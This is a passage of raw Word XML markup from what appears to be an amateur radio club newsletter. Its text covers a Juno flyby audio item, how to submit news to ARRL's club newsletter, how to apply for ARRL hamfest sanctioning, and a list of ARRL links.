    <w:p w14:paraId="7CE3339C" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37477BC2" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CEA9A9" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67681376" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3482FE04" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E7DE5B" w14:textId="77777777" w:rsidR="00A46D96" w:rsidRDefault="00A46D96" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A625899" w14:textId="2057BC84" w:rsidR="001A71D0" w:rsidRPr="00B3771A" w:rsidRDefault="001A71D0" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="national"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidRPr="00B3771A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>National News</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244ABC27" w14:textId="6220DADD" w:rsidR="001A71D0" w:rsidRDefault="001A71D0" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF7911" w:rsidRPr="00BF7911" w14:paraId="2152645C" w14:textId="77777777" w:rsidTr="00BF7911">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="150" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="150" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07C16528" w14:textId="77777777" w:rsidR="00BF7911" w:rsidRPr="00BF7911" w:rsidRDefault="00BF7911" w:rsidP="00BF7911">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF7911">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto"/>
                <w:noProof/>
                <w:color w:val="1155CC"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63602240" wp14:editId="7A0ED08E">
                  <wp:extent cx="2305050" cy="1295400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="21" name="Picture 21" descr="A picture containing sculpture&#10;&#10;Description automatically generated">
                    <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId12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sculpture&#10;&#10;Description automatically generated">
                            <a:hlinkClick r:id="rId124" tgtFrame="&quot;_blank&quot;"/>
                          </pic:cNvPr>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305050" cy="1295400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF7911" w:rsidRPr="00BF7911" w14:paraId="7C0E3579" w14:textId="77777777" w:rsidTr="00BF7911">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="150" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="150" w:type="dxa"/>
              <w:right w:w="600" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70E0D311" w14:textId="77777777" w:rsidR="00BF7911" w:rsidRPr="00BF7911" w:rsidRDefault="00BF7911" w:rsidP="00BF7911">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="2E2F2F"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF7911">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Sounds From Jupiter’s Moon</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF7911">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF7911">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>– We’ve captured some of the dramatic noises released during our Juno mission’s closest approach to the icy moon Ganymede during the spacecraft’s 34th trip around Jupiter.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48265E5D" w14:textId="77777777" w:rsidR="00BF7911" w:rsidRPr="00BF7911" w:rsidRDefault="00BF7911" w:rsidP="00BF7911">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto"/>
          <w:vanish/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF7911" w:rsidRPr="00BF7911" w14:paraId="4C513B63" w14:textId="77777777" w:rsidTr="00BF7911">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="150" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="150" w:type="dxa"/>
              <w:right w:w="600" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="4350" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="4350"/>
            </w:tblGrid>
            <w:tr w:rsidR="00BF7911" w:rsidRPr="00BF7911" w14:paraId="264751C1" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="0" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="0" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:tbl>
                  <w:tblPr>
                    <w:tblW w:w="0" w:type="auto"/>
                    <w:jc w:val="center"/>
                    <w:shd w:val="clear" w:color="auto" w:fill="294B93"/>
                    <w:tblCellMar>
                      <w:left w:w="0" w:type="dxa"/>
                      <w:right w:w="0" w:type="dxa"/>
                    </w:tblCellMar>
                    <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                  </w:tblPr>
                  <w:tblGrid>
                    <w:gridCol w:w="2640"/>
                  </w:tblGrid>
                  <w:tr w:rsidR="00BF7911" w:rsidRPr="00BF7911" w14:paraId="0A2D13F0" w14:textId="77777777">
                    <w:trPr>
                      <w:jc w:val="center"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="0" w:type="auto"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="294B93"/>
                        <w:tcMar>
                          <w:top w:w="225" w:type="dxa"/>
                          <w:left w:w="450" w:type="dxa"/>
                          <w:bottom w:w="225" w:type="dxa"/>
                          <w:right w:w="450" w:type="dxa"/>
                        </w:tcMar>
                        <w:hideMark/>
                      </w:tcPr>
                      <w:p w14:paraId="02FEF5EC" w14:textId="77777777" w:rsidR="00BF7911" w:rsidRPr="00BF7911" w:rsidRDefault="0084211F" w:rsidP="00BF7911">
                        <w:pPr>
                          <w:jc w:val="center"/>
                          <w:divId w:val="1070425701"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="21"/>
                            <w:szCs w:val="21"/>
                          </w:rPr>
                        </w:pPr>
                        <w:hyperlink r:id="rId126" w:tgtFrame="_blank" w:history="1">
                          <w:r w:rsidR="00BF7911" w:rsidRPr="00BF7911">
                            <w:rPr>
                              <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                              <w:color w:val="FFFFFF"/>
                              <w:sz w:val="21"/>
                              <w:szCs w:val="21"/>
                              <w:u w:val="single"/>
                            </w:rPr>
                            <w:t>Listen to the Audio</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="7E629050" w14:textId="77777777" w:rsidR="00BF7911" w:rsidRPr="00BF7911" w:rsidRDefault="00BF7911" w:rsidP="00BF7911">
                  <w:pPr>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="21"/>
                      <w:szCs w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="191817AE" w14:textId="77777777" w:rsidR="00BF7911" w:rsidRPr="00BF7911" w:rsidRDefault="00BF7911" w:rsidP="00BF7911">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2179410E" w14:textId="43C177B9" w:rsidR="001A71D0" w:rsidRDefault="001A71D0" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C26F8B" w14:textId="3059B97D" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483DF2CD" w14:textId="3AE4FFEB" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>Submitting Info for th</w:t>
      </w:r>
      <w:r w:rsidR="001170F5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>e ARRL “Clubs”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t xml:space="preserve"> Newsletter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B986B02" w14:textId="77777777" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:spacing w:before="120" w:after="150"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRL Club News is for radio clubs to show how they are working in the community and the hobby to advance amateur radio. If your club does a project, supports an event, does an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>EmComm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> activation or activates a park, we want to hear about it. You can submit your newsletter article to us at </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>clubs@arrl.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>. We like to get them as text or Word files instead of "PDFs". If you have pictures, please submit them with any caption information, as well as the name and call sign of the photographer. We want to highlight the good work being done by the clubs and show others in the community of clubs. Think of this as a chance to show off your club and your programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714DD89B" w14:textId="77777777" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>How to Plan and Apply for an ARRL Hamfest or Convention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527BAAF1" w14:textId="77777777" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:spacing w:before="120" w:after="150"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">If your amateur radio club is planning to host a convention, hamfest, tailgate, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>swapfest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>, please consider applying for ARRL sanctioned status for your event. To learn what it means to be an ARRL sanctioned event, and to get some ideas on how to prepare for and conduct a hamfest or convention, visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org/arrl-sanctioned-events</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D59CA79" w14:textId="77777777" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:spacing w:before="120" w:after="150"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>To apply for ARRL sanctioned status for your event, log on to </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org/hamfest-convention-application</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B96584" w14:textId="77777777" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:spacing w:before="120" w:after="150"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The ARRL Hamfests and Conventions Calendar can be found online at </w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org/hamfests</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>. In addition, the Convention and Hamfest Calendar that runs in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>QST each month</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> also presents information about upcoming events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B783F9C" w14:textId="77777777" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>Important Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D2886" w14:textId="77777777" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:spacing w:before="120" w:after="150"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>ARRL Home: </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
        <w:t>Find an ARRL Affiliated Club: </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org/clubs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Find Your ARRL Section: </w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org/sections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
        <w:t>Find a License Class in your area: </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org/class</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
        <w:t>Find a License Exam in your area: </w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org/exam</w:t>
        </w:r>
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:br/>
        </w:r>
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Find a Hamfest or Convention: </w:t>
      </w:r>
      <w:hyperlink r:id="rId136" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.arrl.org/hamfests</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D86026">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
        <w:t>Email ARRL Clubs: </w:t>
      </w:r>
      <w:hyperlink r:id="rId137" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D86026">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>clubs@arrl.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02788968" w14:textId="77777777" w:rsidR="00D86026" w:rsidRPr="00D86026" w:rsidRDefault="00D86026" w:rsidP="00D86026">
      <w:pPr>
        <w:spacing w:before="120" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
